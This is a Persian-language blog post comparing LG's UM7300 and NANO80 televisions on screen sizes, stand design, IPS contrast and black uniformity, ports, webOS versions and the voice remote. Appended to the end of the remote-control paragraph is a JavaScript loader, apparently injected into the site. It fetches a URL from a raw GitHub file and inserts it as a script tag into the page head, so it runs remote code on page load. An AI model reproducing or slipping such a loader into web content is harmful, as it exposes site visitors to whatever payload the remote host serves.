دسته‌بندی نشده

مقایسه دو تلویزیون پر فروش 2020/UM7300 و NANO80

اینچ های ارائه شده 

دو تلویزیون UM7300 و NANO80 سال 2020 در سایز و اندازه های متنوع عرضه شده اند. این اندازه ها برای استفاده از تلویزیون در محیط های مختلف کاربرد دارند و بسیار عالی برای برای گسترش کارایی تلویزیون می باشد. UM7300 در 5 اندازه و NANO80 در 4 اینچ مختلف عرضه می شوند. nano80 در اندازه های 49 اینچ که برای اتاق های کوچک استفاده می شود و اندازه های 55 اینچ, 65 و 75 اینچ که برای سالن های نسبتا بزرگ و دارای متراژ بالا استفاده می شود عرضه شده است. UM7300 در دو اندازه کوچک 43 اینچ و 49 اینچ که برای اشپزخانه و اتاق خواب کاربرد دارد و یا می توان از ان به عنوان مانیتور استفاده کرد. 50, 55 اینچ و 65 نیز اندازه های بزرگی هستند که برای محیط های متراژ بالاتر استفاده می شوند. 

انتخاب تلویزیون مناسب برای سالن و خانه ها

دیزاین و ساختار

تلویزیون UM7300 دارای دیزاینی فوق العاده و مینیمالیستی است. در این تلویزیون از صفحه نمایش تخت با حاشیه های باریک استفاده شده است و همچنین دارای پایه ای دو طرفه است که می توانند به خوبی تلویزیون را ساپورت کنند. NANO80 ال جی طراحی شیک و ساده در عین حال فوق العاده ای دارد در این تلویزیون مانند دیگر محصولا نانوسل از طراحی ممتازی استفاده نشده است و بیشتر شبیه به تلویزیون UN7000 طراحی شده است. این تلویزیون به جای پایه مرکزی با پایه های دو طرفه طراحی شده است و از این نظر به مدل های بالا رده بسیار نزدیک است. این پایه ها تقریبا دارای پهنا به اندازه خود تلویزیون هستند بنابراین نیاز به یک میز بزرگ برای قرار گیری تلویزیون خواهید داشت. هر دو تلویزیون را می توان با جدا کردن پایه ها به اسانی به دیوار وصل کرد. 

کنتراست و مشخصات تصویری 

همانطور که از یک پنل IPS انتظار می رود تلویزیون UM7300 دارای نسبت کنتراست متوسط می باشد. رنگ های مشکی روی نمایشگر این تلویزیون در اتاق های تاریک بیشتر به خاکستری نزدیک هستند و متاسفانه در ان از فناوری لوکال دیمینگ برای ارتقا کارکرد در اتاق های تاریک استفاده نشده است. سایز 50 اینچ این تلویزیون دارای پنل VA است بنابراین نسبت کنتراست بهتری دارد. NANO80 نیز به همین صورت است و به دلیل استفاده از پنل IPS نسبت کنتراست متوسطی دارد. در این تلویزیون نیز قابلیت لوکال دیمینگ بکار نرفته است بنابراین نباید انتظار هیچگونه ارتقا کارایی از ان باشیم.

یکنواختی رنگ های مشکی در UM7300 مناسب است البته با وجود پنل IPS نمی توان گفت که یکنواختی به صورت بی عیب و نقص ارائه می شوند. یکنواختی مشکی در تلویزیون NANO80 چندان چشمگیر نمی باشد البته از بسیاری از تلویزیون های ال جی مانند NANO81 بهتر عمل می کند. یکنواختی رنگ مشکی دربین واحد های مختلف متفاوت است.

زاویه دید در هر دو تلویزیون با توجه به پنل IPS بکار رفته برای ان ها به صورت گسترده ارائه می شود اما مانند دیگر پنل های IPS بی عیب و ایراد نمی باشد.

کنترل انعکاس در این دو تلویزیون به صورتی عالی انجام می شود. UM7300 مشابه به تلویزیون UK7700 عمل می کند و می تواند بازتاب های مختلف روی نمایشگر را به اسانی کنترل کند. NANO80 ممکن از در تابش های مستقیم دچار مشکل شود.

در هر دو تلویزیون محتویات با کیفیت 4K پخش می شوند. کیفیت تصویر 8K روی هیچ یک از ان ها پشتیبانی نخواهد شد اما محتوا فورکی بدون هیچ ایرادی برای کاربران پخش خواهد شد. 1080p همانند محتوا فورکی زیبایی و درخشش خاصی روی نمایشگر دارند. ارتقا تصاویر 480P و 720P روی این دو نمایشگر به اسانی و به بهترین صورت انجام می گیرد. 

درگاه های ارتباطی 

در هر دو تلویزیون پر فروش ال جی درگاه های ارتباطی مختلف در بخش پشتی و در قسمت کناری ان طراحی شده است که باعث اسان تر شدن ارتباط تلویزیون با دستگاه های مختلف می شود. تلویزیون 2020 مدل UM7300 دارای درگاه های HDMI به تعداد 3 عدد و USB به تعداد 2 عدد می باشد. این دو ورودی از پرطرفدار ترین و پر کاربرد ترین درگاه های تعبیه شده برای تلویزیون می باشد. با HDMI انواع دستگاه صوتی و تصویری مانند کنسول بازی و ساندبار به تلویزیون وصل خواهد شد. درگاه های اپتیکال, تونر, انترنت, کامپونت و کامپوزیت به تعداد 1 عدد روی این تلویزیون ارائه می شوند. NANO80 نیز دارای درگاه های ارتباطی مشابه با همین تعداد است تنها از نظر HDMI با تلویزیون UM7300 متفاوت است و روی ان 4 درگاه HDMI نعبیه شده است. 

قابلیت های اسمارت

در دو تلویزیون پرفروش 2020 ال جی NANO80 و UM7300 از پلتفرم اختصاصی این برند WEBOS استفاده شده است. تلویزیون نانو دارای ورژن بالاتر ان 5.0 است و بر روی UM7300 ورژن 4.5 اجرا شده است. کارکرد  این دو نسخه بسیار اسان و روان است و بر روی ان ها اپلیکیشن ها و قابلیت های هوشمند مختلفی ارائه می شود. پلتفرم WebOS فوق العاده کاربر پسند است و اپلیکیشن ها متنوعی را برای سرگرم کردن افراد دارد و بیشتر اپلیکیشن های معروف و محبوب روی ان ها قابل اجرا می باشند. 

ریموت کنترل

هر دو تلویزیون دارای ریموت کنترل در اندازه بزرگ و مشابه با ریموت تلویزیون های بالا رده ال جی می باشند. این ریموت به صورت معمولی و اشاره گر قابل استفاده است و یا می توان با استفاده از دستگاه های دیگربه صورت برنامه ای از ان استفاده کرد. در این دو ریموت مکروفون توکار تعبیه شده است بنابراین امکان کنترل صوتی تلویزیون به اسانی برای کاربران فراهم خواهد شد.  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *